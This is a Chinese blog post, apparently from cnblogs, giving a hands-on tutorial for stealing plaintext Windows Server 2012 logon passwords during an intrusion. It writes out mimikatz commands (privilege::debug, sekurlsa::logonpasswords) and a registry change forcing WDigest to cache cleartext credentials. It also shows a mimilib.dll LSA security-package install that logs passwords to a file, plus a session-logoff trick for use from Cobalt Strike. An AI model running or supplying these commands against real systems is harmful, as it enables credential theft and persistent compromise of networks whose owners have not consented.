首页 > 其他分享 >内网渗透-winserver2012抓取明文密码

内网渗透-winserver2012抓取明文密码

时间:2023-02-16 17:44:05浏览次数:44  
标签:mimilib winserver2012 抓取 明文 密码 mimikatz 注册表 ID

问题引入:winserver2012使用mimikatz是无法抓取明文密码的,要获取明文密码需要修改其注册表。

法一:

在未修改注册表的情况下,使用mimikatz来读取密码:

privilege::debug

sekurlsa::logonpasswords

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >123.txt (一句话保存抓到的密码)

实战亲测:无法获取明文密码:

 

(2)修改注册表命令:

这里如果要设置为能够重新用WDigest存储明文使用命令修改UseLogonCredential键值修改为1即可

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

 

(3)然后锁屏后重新登录:

 

再次查看,发现密码已经明文显示:

 

 

 法二:

mimikatz读取明文密码:利用mimikatz:

(1)将mimilib.dll复制到:c:\windows\system32 (2)添加注册表:添加mimilib.dll
reg add  "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\" /v  "Security Packages" /d mimilib.dll /t REG_MULTI_SZ /f  (意思是在Security Packages下加入mimilib)
 

 

 

 

(3)注销后或重启均可记录登录的密码,在system32的kiwissp.log 内:

 

 

同样可以记录用户登录的明文密码:

思考:实战环境应该是我们在CS内修改注册表,然后怎么才能使用命令行注销服务器呢?如下

答:查询当前运行中的会话ID,然后logoff 该ID即可:

query session ?ID | logoff ?ID

标签:mimilib,winserver2012,抓取,明文,密码,mimikatz,注册表,ID
From: https://www.cnblogs.com/cute-puli/p/17127610.html

相关文章

  • 淘宝抓取终于稳定实现了
    淘宝数据爬取一直是一个不疼但很痒的问题。淘宝有网页版,并不像闲鱼、得物之类的只有App端数据呈现。但淘宝又有厉害到不行的风控和反爬算法,总之想拿淘宝数据,想想很容易,做做......
  • TypeScript:类型标注和d.ts类型声明文件的使用
    通过引入ts的类型声明,编辑器可以很好的进行提示,提高开发效率(目录)默认引入jsmain.tsimport{jQuery}from"./jquery";varmsg:string="HelloWorld!";jQuery......
  • 抓取toast提示及各种弹窗定位
    一般来说,toast提示显示时间都很快1.可以用浏览器debug操作,定位元素2.toast提示属于html弹窗,可以直接定位到,不需要switch_to3.弹窗(alert、confirm、prompt),属于浏览器弹......
  • 抓取安卓闪退日志教程
    在开发手机APP时,如果遇到应用闪退、卡顿无反应情况,往往需要抓取日志,帮助定位问题。本文简要介绍使用adb抓取日志的方法。分以下三步进行介绍:1.安装java运行环境jdk,并......
  • 抓取安卓闪退日志教程
    在开发手机APP时,如果遇到应用闪退、卡顿无反应情况,往往需要抓取日志,帮助定位问题。本文简要介绍使用adb抓取日志的方法。分以下三步进行介绍:1.安装java运行环境jdk,并配......
  • mitmproxy 抓包神器-3.抓取网站数据或图片
    前言Mitmproxy是一个免费的开源交互式的HTTPS代理。MITM即中间人攻击(Man-in-the-MiddleAttack)。mitmproxy工具有以下三个组件构成mitmproxy是具有SSL/TLS功能的交......
  • 用AngleSharp & LINQPad抓取分析博客园排行榜
    AngleSharp简单介绍AngleSharp是一个.NET库使您能够解析基于尖括号的超文本,如HTML、SVG、MathML、XMLAngleSharp的一个重要方面是CSS也可以解析。同时还是开源,免费......
  • Python爬虫-第四章-5-高效抓取视频网站视频资源至本地
    本章内容:  91看剧抓取影视资源  流程:    1.获取影片播放页面源码    2.获取m3u8链接地址    3.下载m3u8文件    4.读取m3u8......
  • 网页抓取实例之wildberries电商平台数据抓取
     电商平台的数据抓取,一直是网页抓取公式的热门实战实例,之前我们通常是针对国内的电商平台进行数据抓取,昨天小编受到委托,针对一个俄罗斯电商平台wildberries做了数据抓取,......
  • python数据抓取,抓点星星网的内容
    代码:#coding=utf-8importos,sys,reimportrequestsfromwebob.excimportstrip_tagsfromxpinyinimportPinyindefstr2dict(str):dict={}groups1......